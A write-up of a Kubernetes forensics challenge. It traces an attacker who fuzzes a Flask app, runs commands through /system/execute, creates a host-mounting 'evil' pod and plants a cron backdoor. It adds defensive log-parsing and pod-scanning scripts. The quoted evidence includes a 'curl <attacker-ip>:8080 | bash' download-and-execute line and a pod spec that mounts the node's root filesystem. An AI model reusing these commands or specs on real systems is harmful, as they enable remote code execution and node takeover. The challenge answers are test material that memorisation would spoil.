OPTinselTrace24-2: Cookie Consumption Sherlock Scenario
Santa’s North Pole Operations have implemented the “Cookie Consumption Scheduler” (CCS), a crucial service running on a Kubernetes cluster. This service ensures Santa’s cookie and milk intake is balanced during his worldwide deliveries, optimizing his energy levels and health.
Tasks

Task 1: How many replicas are configured for the flask-app deployment? (integer, e.g. 65)
Task 2: What is the NodePort through which the flask-app is exposed? (*****/TCP)
Task 3: What time (UTC) did the attacker first initiate fuzzing on the /system/ endpoint? (YYYY-MM-DD hh:mm:ss)
Task 4: Which endpoint did the attacker discover through fuzzing and subsequently exploit? (/system/*******)
Task 5: Which program did the attacker attempt to install to access their HTTP pages? (****)
Task 6: What is the IP address of the attacker? (**.***.***.***)
Task 7: What is the name of the pod that was compromised and used by the attacker as the initial foothold? (flask-app-**********-*****)
Task 8: What is the name of the malicious pod created by the attacker?
Task 9: What is the absolute path of the backdoor file left behind by the attacker?
Task 1: How many replicas are configured for the flask-app deployment?

Answer: 3

The evidence bundle contains one deployments.log per namespace with the `kubectl describe deployment` output. The NewReplicaSet line of the flask-app deployment shows 3 desired and 3 created:

```
└─$ grep 'replicas ' ./* -r
./default/describes/deployments.log:NewReplicaSet:   flask-app-77fbdcfcff (3/3 replicas created)
./kube-system/describes/deployments.log:NewReplicaSet:   coredns-7b98449c4 (1/1 replicas created)
./kube-system/describes/deployments.log:NewReplicaSet:   local-path-provisioner-595dcfc56f (1/1 replicas created)
./kube-system/describes/deployments.log:NewReplicaSet:   metrics-server-cdcc87586 (1/1 replicas created)
./kube-system/describes/deployments.log:NewReplicaSet:   traefik-d7c9c5778 (1/1 replicas created)
```

The same describe output also has a `Replicas:` field (desired | updated | total | available | unavailable) that states the configured count directly; the lowercase, trailing-space pattern above only matches the ReplicaSet event line. The ReplicaSet hash 77fbdcfcff is worth noting now, because every flask-app pod name in the rest of the evidence carries it.
Task 2: What is the NodePort through which the flask-app is exposed?

Answer: 30000/TCP

```
└─$ head -30 ./default/describes/services.log
Name:                     flask-app-service
Namespace:                default
Labels:                   <none>
Annotations:              <none>
Selector:                 app=flask-app
Type:                     NodePort
IP Family Policy:         SingleStack
IP Families:              IPv4
IP:                       10.43.58.30
IPs:                      10.43.58.30
Port:                     <unset>  5000/TCP
TargetPort:               5000/TCP
NodePort:                 <unset>  30000/TCP
Endpoints:                10.42.0.14:5000,10.42.0.16:5000,10.42.0.17:5000
Session Affinity:         None
External Traffic Policy:  Cluster
Events:                   <none>
```

A NodePort service listens on port 30000 of every node's IP and spreads connections across the three endpoints (the three replicas from task 1), so consecutive requests from one attacker can land on different pods. With External Traffic Policy set to Cluster the traffic is source-NATed on its way to the pod, which is why the application logs in the following tasks record 10.42.0.1 (the node's address on the cluster network) as the client rather than the attacker's real IP.
Task 3: What time (UTC) did the attacker first initiate fuzzing on the /system/ endpoint?

Answer: 2024-11-08 22:02:48

```
└─$ grep -a -i '/system/' ./* -r | sort -u | head -30
./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:01:37] "GET /system/status?service=ssh HTTP/1.1" 500 -
./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:38] "GET /system/logs?service=system HTTP/1.1" 500 -
./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:48] "GET /system/ls HTTP/1.1" 404 -
./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:56] "GET /system/admin HTTP/1.1" 404 -
./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:04:47] "GET /system/admin HTTP/1.1" 404 -
```

The two 500s at 22:01:37 and 22:02:38 are requests to routes that exist (/system/status and /system/logs) with a tampered service= parameter, so they are probing of known endpoints, not fuzzing. The first request for a path the application does not serve, GET /system/ls answered with 404 at 22:02:48, is where wordlist-driven enumeration of /system/ starts. One caveat on the pipeline: sort -u orders these lines lexically by file name and then by the bracketed timestamp, which is only chronological within a single month (days sort correctly, month names do not); for a longer log, sort on a parsed timestamp instead.
Task 4: Which endpoint did the attacker discover through fuzzing and subsequently exploit?

Answer: /system/execute

```
└─$ grep -a 'system/execute' ./* -r | head -10
./default/flask-app-77fbdcfcff-m9rh4/flask-app-previous.log:10.42.0.1 - - [07/Nov/2024 18:08:12] "POST /system/execute HTTP/1.1" 200 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:10:03] "GET /system/execute HTTP/1.1" 405 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:12:05] "GET /system/execute HTTP/1.1" 405 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:[2024-11-08 22:14:50,909] ERROR in app: Exception on /system/execute [POST]
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:14:50] "POST /system/execute HTTP/1.1" 500 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:[2024-11-08 22:15:23,483] ERROR in app: Exception on /system/execute [POST]
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:15:23] "POST /system/execute HTTP/1.1" 500 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:24:40] "POST /system/execute HTTP/1.1" 200 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:25:04] "POST /system/execute HTTP/1.1" 200 -
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:25:05] "POST /system/execute HTTP/1.1" 200 -
```

The sequence is the usual one for a command endpoint found by enumeration: GET returns 405 (the route exists but accepts a different verb), the first POSTs at 22:14:50 and 22:15:23 raise unhandled exceptions in the app (logged as "ERROR in app"), and from 22:24:40 onward the POSTs return 200 at a pace of seconds, which is interactive command execution. The flask-app-previous.log file is the log of the previous instance of the same container (what `kubectl logs --previous` returns); the 07/Nov POST 200 in it predates the container restart and the 08/Nov intrusion and only shows that the endpoint was already live the day before.
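The grep-and-eyeball approach in tasks 3 and 4 does not scale to a log with thousands of lines, and it is easy to mistake a 500 on a real route for the start of fuzzing. The script below is an added example, not part of the original writeup or of the Sherlock's material: it parses Werkzeug access-log lines, skips the non-access lines that share the file (Flask tracebacks, command output the app leaked into its own log), reports the first 404 under a prefix as the fuzzing start, and lists routes that were probed (404/405) and later answered 200 to a POST. The sample lines are constructed from the entries quoted above; the two pods' lines are merged into one list for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the flask-app.log lines quoted in tasks 3 and 4, plus two of the
# non-access lines that appear in the same files (a Flask traceback header and leaked
# command output), so the parser is exercised on the noise it has to skip.
SAMPLE_LOG = [
    '10.42.0.1 - - [08/Nov/2024 22:01:37] "GET /system/status?service=ssh HTTP/1.1" 500 -',
    '10.42.0.1 - - [08/Nov/2024 22:02:38] "GET /system/logs?service=system HTTP/1.1" 500 -',
    '10.42.0.1 - - [08/Nov/2024 22:02:48] "GET /system/ls HTTP/1.1" 404 -',
    '10.42.0.1 - - [08/Nov/2024 22:02:56] "GET /system/admin HTTP/1.1" 404 -',
    '10.42.0.1 - - [08/Nov/2024 22:10:03] "GET /system/execute HTTP/1.1" 405 -',
    '[2024-11-08 22:14:50,909] ERROR in app: Exception on /system/execute [POST]',
    '10.42.0.1 - - [08/Nov/2024 22:14:50] "POST /system/execute HTTP/1.1" 500 -',
    'sh: 1: curl: not found',
    '10.42.0.1 - - [08/Nov/2024 22:24:40] "POST /system/execute HTTP/1.1" 200 -',
    '10.42.0.1 - - [08/Nov/2024 22:25:04] "POST /system/execute HTTP/1.1" 200 -',
]

# Werkzeug (Flask development server) access-log format:
#   <client> - - [dd/Mon/yyyy HH:MM:SS] "<METHOD> <path> HTTP/x.y" <status> -
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) - - \[(?P<ts>\d{2}/[A-Za-z]{3}/\d{4} \d{2}:\d{2}:\d{2})\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def parse_access_line(line):
    """(datetime, client, method, path without query string, status) for an access-log
    line, or None for anything else (tracebacks, command output leaked into the log)."""
    m = ACCESS_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y %H:%M:%S")
    path = m.group("path").split("?", 1)[0]
    return ts, m.group("src"), m.group("method"), path, int(m.group("status"))


def first_fuzz_time(lines, prefix="/system/"):
    """Start of endpoint brute-forcing under `prefix`: the earliest request for a path the
    app does not serve (404). 500s against existing routes are parameter tampering, not
    fuzzing, so they are deliberately not counted. Returns 'YYYY-MM-DD hh:mm:ss' or None."""
    hits = [r for r in map(parse_access_line, lines)
            if r and r[3].startswith(prefix) and r[4] == 404]
    return min(hits)[0].strftime("%Y-%m-%d %H:%M:%S") if hits else None


def exploited_endpoints(lines, prefix="/system/"):
    """Paths under `prefix` that were probed first (404 or 405) and later answered 200 to a
    POST. 'GET -> 405, then POST -> 200' is the signature of a route found by fuzzing and
    then used; routes that only ever 404 were guesses that did not exist."""
    by_path = defaultdict(list)
    for r in map(parse_access_line, lines):
        if r and r[3].startswith(prefix):
            by_path[r[3]].append(r)
    found = []
    for path, recs in by_path.items():
        recs.sort(key=lambda r: r[0])
        probes = [r[0] for r in recs if r[4] in (404, 405)]
        if probes and any(r[2] == "POST" and r[4] == 200 and r[0] > probes[0] for r in recs):
            found.append(path)
    return sorted(found)


if __name__ == "__main__":
    print("fuzzing started:", first_fuzz_time(SAMPLE_LOG))
    print("exploited:", exploited_endpoints(SAMPLE_LOG))
```

Against a real evidence bundle, feed it the concatenation of every flask-app*.log (including the -previous ones) rather than one pod's file, since the NodePort spreads one attacker's requests across replicas. Timestamps are taken as written; the Sherlock states they are UTC, and a production deployment should log with an explicit zone so this does not have to be assumed.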
Task 5: Which program did the attacker attempt to install to access their HTTP pages?

Answer: curl

```
└─$ grep 'curl' ./* -r
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:E: Unable to locate package curl
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:E: Unable to locate package curl
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:  libbrotli1 libcurl4 libldap-2.5-0 libldap-common libnghttp2-14 libpsl5
./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:  curl libbrotli1 libcurl4 libldap-2.5-0 libldap-common libnghttp2-14 libpsl5
```

None of these are access-log entries. They are the stdout/stderr of commands the attacker ran through /system/execute, written into the container log because the app spawned them via /bin/sh (the "sh: 1:" prefix is dash's error format). The image ships without curl, the first apt-get attempts fail with "Unable to locate package curl" (no package lists in the image), and the trailing lines are apt's dependency lists for an install of curl, so a later attempt at least reached package resolution. Command output turning up inside an application log is a reliable detection signal for a command-execution endpoint, independent of which command was run.
Task 6: What is the IP address of the attacker?

Answer: 10.129.231.112

```
./host-processes.log:root       98203  0.0  0.0   2576   888 ?        S    Nov08   0:00 sh -c curl 10.129.231.112:8080 | bash
```

The application logs only ever show 10.42.0.1 (see task 2), so the attacker's address has to come from the node. host-processes.log is a process listing taken on the node itself, and it contains a root-owned `sh -c curl 10.129.231.112:8080 | bash`: a download-and-execute of a script served from the attacker's own machine on port 8080. That line gives the attacker IP, and it also shows the attacker running commands as root on the node rather than only inside a pod. 10.129.231.112 sits on the same 10.129.0.0/16 as the node (10.129.229.38, task 8), outside the pod (10.42.x) and service (10.43.x) ranges seen above, so it is external to the cluster.
Task 7: What is the name of the pod that was compromised and used by the attacker as the initial foothold?

Answer: flask-app-77fbdcfcff-2tqgw

```
./system_logs/node_logs/flask-app-77fbdcfcff-2tqgw_default_flask-app-0c6f23d9953921a31ec11074089eb67299221b05410a12185af82d8272bf1af5.log:{"log":"E: Unable to locate package curl\n","stream":"stderr","time":"2024-11-08T22:24:09.390009722Z"}
```

This is the node-side copy of the container log: the JSON-per-line file the container runtime writes under the node's log directory, named pod_namespace_container-containerID.log, with the raw line in "log", the stream it came from and a nanosecond UTC timestamp. It records the failed curl install inside 2tqgw at 22:24:09Z. Because the NodePort service spreads requests over all three replicas, the attacker's activity is split across pod logs: the fuzzing in task 3 landed on 2tqgw, while the /system/execute traffic in tasks 4 and 5 shows up in m9rh4. 2tqgw received the first fuzzing request and the earliest command execution attempts, which is why it is taken as the initial foothold.
Task 8: What is the name of the malicious pod created by the attacker?

Answer: evil

Note that in the evidence the Pod object is named alpine and evil is the name of its only container; the artefacts refer to it by both (e.g. default_alpine_evil_process_dump.txt). Searching for the alpine image turns it up in the process dump, the pod describes and the collected container logs:

```
└─$ grep 'alpine' ./* -r -a
./default/processes/default_alpine_evil_process_dump.txt:Collecting processes for Namespace: default, Pod: alpine, Container: evil
./default/describes/pods.log:Name:             alpine
./default/describes/pods.log:    Image:          alpine:latest
./default/describes/pods.log:    Image ID:       docker-pullable://alpine@sha256:beefdbd8a1da6d2915566fde36db9db0b524eb737fc57cd1367effd16dc0d06d
./default/alpine/evil-previous.log:Error from server (BadRequest): previous terminated container "evil" in pod "alpine" not found
```

The full entry from pods.log:

```
Name:             alpine
Namespace:        default
Priority:         0
Service Account:  default
Node:             northpole/10.129.229.38
Start Time:       Fri, 08 Nov 2024 22:39:47 +0000
Labels:           <none>
Annotations:      <none>
Status:           Running
IP:               10.129.229.38
IPs:
  IP:  10.129.229.38
  IP:  dead:beef::250:56ff:feb4:5a90
Containers:
  evil:
    Container ID:  docker://f819d84f97e69fc0784c521760594cf1692c39bdc5fbd429f86aed07928a511c
    Image:         alpine:latest
    Image ID:      docker-pullable://alpine@sha256:beefdbd8a1da6d2915566fde36db9db0b524eb737fc57cd1367effd16dc0d06d
    Port:          <none>
    Host Port:     <none>
    Command:
      /bin/sh
    Args:
      -c
      sleep 300000
    State:          Running
      Started:      Fri, 08 Nov 2024 22:39:51 +0000
    Ready:          True
    Restart Count:  0
    Environment:    <none>
    Mounts:
      /mnt from hostfs (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-n9bp9 (ro)
Conditions:
  Type                        Status
  PodReadyToStartContainers   True
  Initialized                 True
  Ready                       True
  ContainersReady             True
  PodScheduled                True
Volumes:
  hostfs:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:
  kube-api-access-n9bp9:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   BestEffort
Node-Selectors:              <none>
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:                      <none>
```

What makes this pod malicious is its spec, not the image. The hostfs volume is a HostPath of / mounted read-write at /mnt, which gives a shell in the container the node's entire filesystem; the pod's IP is the node's IP (10.129.229.38), which is what a pod running with host networking looks like; the command is `sleep 300000`, a placeholder that keeps the container alive so the attacker can exec into it; and it runs under the default service account. The start time, 22:39:47, is about fifteen minutes after the first successful POST to /system/execute at 22:24:40 (task 4). Anything written under /mnt lands on the real node filesystem, which is consistent with the root process in task 6 and the cron persistence in task 9 being found on the node rather than in a container. Creating a pod requires API access; the service-account token projected into the compromised flask-app pod is the obvious candidate, but the artefacts shown here do not record which credential was used.
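The describe output above is the manual version of a check that should run at admission time or, failing that, over `kubectl get pods -A -o json` on a schedule. The following is an added example written for this writeup, not code from the Sherlock or from any Kubernetes project: it scores a pod object for the spec features that let a container reach the node (hostPath, especially /, mounted read-write; privileged; hostNetwork; hostPID) plus two lower-severity hygiene points (unpinned image tag, automounted default service-account token). EVIL_POD mirrors the alpine/evil pod; `hostNetwork: true` is an assumption inferred from the pod IP equalling the node IP, since `kubectl describe` does not print that field. BENIGN_POD is an invented well-configured comparison.

```python
# Constructed pod objects in the shape of `kubectl get pod <name> -o json`. EVIL_POD mirrors
# the describe output above; BENIGN_POD is a made-up well-configured comparison.
# Neither is the Sherlock's raw data.
EVIL_POD = {
    "metadata": {"name": "alpine", "namespace": "default"},
    "spec": {
        "hostNetwork": True,            # assumption: inferred from pod IP == node IP
        "serviceAccountName": "default",
        "containers": [{
            "name": "evil",
            "image": "alpine:latest",
            "command": ["/bin/sh"],
            "args": ["-c", "sleep 300000"],
            "volumeMounts": [{"name": "hostfs", "mountPath": "/mnt"}],
        }],
        "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
    },
}
BENIGN_POD = {
    "metadata": {"name": "flask-app-77fbdcfcff-2tqgw", "namespace": "default"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{
            "name": "flask-app",
            "image": "registry.example/flask-app:1.4.2",   # hypothetical pinned image
            "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}],
        }],
        "volumes": [{"name": "tmp", "emptyDir": {}}],
    },
}

SEVERITY = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}


def pod_findings(pod):
    """Spec-level findings for one pod object, most severe first. An empty list means
    nothing in the spec reaches outside the container's own namespaces."""
    spec = pod.get("spec", {})
    meta = pod.get("metadata", {})
    who = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
    findings = []
    volumes = {v["name"]: v for v in spec.get("volumes", [])}
    for name, vol in volumes.items():
        hp = vol.get("hostPath")
        if hp is not None:
            path = hp.get("path", "")
            # / (or an empty path) exposes the whole node; any other hostPath is still HIGH
            sev = "CRITICAL" if path in ("", "/") else "HIGH"
            findings.append(f"{sev} {who}: volume {name} is hostPath {path!r}")
    if spec.get("hostNetwork"):
        findings.append(f"HIGH {who}: hostNetwork=true (pod IP is the node IP, node "
                        f"listeners reachable on localhost)")
    if spec.get("hostPID"):
        findings.append(f"HIGH {who}: hostPID=true (node processes visible to the pod)")
    for c in spec.get("containers", []):
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"CRITICAL {who}: container {c['name']} is privileged")
        for m in c.get("volumeMounts", []):
            vol = volumes.get(m["name"], {})
            if "hostPath" in vol and not m.get("readOnly", False):
                findings.append(f"CRITICAL {who}: container {c['name']} mounts hostPath "
                                f"{vol['hostPath'].get('path', '')!r} read-write at "
                                f"{m['mountPath']}")
        image = c.get("image", "")
        ref = image.rsplit("/", 1)[-1]          # strip registry/repo, keep name[:tag]
        if "@" not in image and (":" not in ref or ref.endswith(":latest")):
            findings.append(f"LOW {who}: container {c['name']} runs unpinned image {image!r}")
    if (spec.get("serviceAccountName", "default") == "default"
            and spec.get("automountServiceAccountToken", True)):
        findings.append(f"MEDIUM {who}: default service-account token automounted")
    return sorted(findings, key=lambda f: SEVERITY[f.split()[0]])


def node_takeover_capable(pod):
    """True when the spec alone gives a shell in the pod write access to the node
    (a read-write hostPath of / or a privileged container)."""
    return any(f.startswith("CRITICAL") for f in pod_findings(pod))


if __name__ == "__main__":
    for f in pod_findings(EVIL_POD):
        print(f)
    print("benign findings:", pod_findings(BENIGN_POD))
```

In a cluster the same rules belong in an admission policy (Pod Security Admission at the `baseline` level already rejects hostPath, hostNetwork, hostPID and privileged containers for a namespace); the scanner version is for finding what was admitted before such a policy existed, which is exactly the situation this Sherlock describes.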
Task 9: What is the absolute path of the backdoor file left behind by the attacker?

Answer: /opt/backdoor.sh

```
└─$ grep '/opt/' ./* -r | head -20
./cron.txt:*/5 * * * * /opt/backdoor.sh
```

cron.txt is the crontab dump taken from the node, and a crontab entry running an attacker-placed script every five minutes is the persistence mechanism. Cron does not depend on the evil pod or on the compromised application still running, so the backdoor survives deleting the pod and rolling the flask-app deployment. Remediation on the node has to remove both the crontab line and /opt/backdoor.sh (and whatever the script pulls in), and then rotate every credential the node and the flask-app pods had access to, starting with the service-account tokens.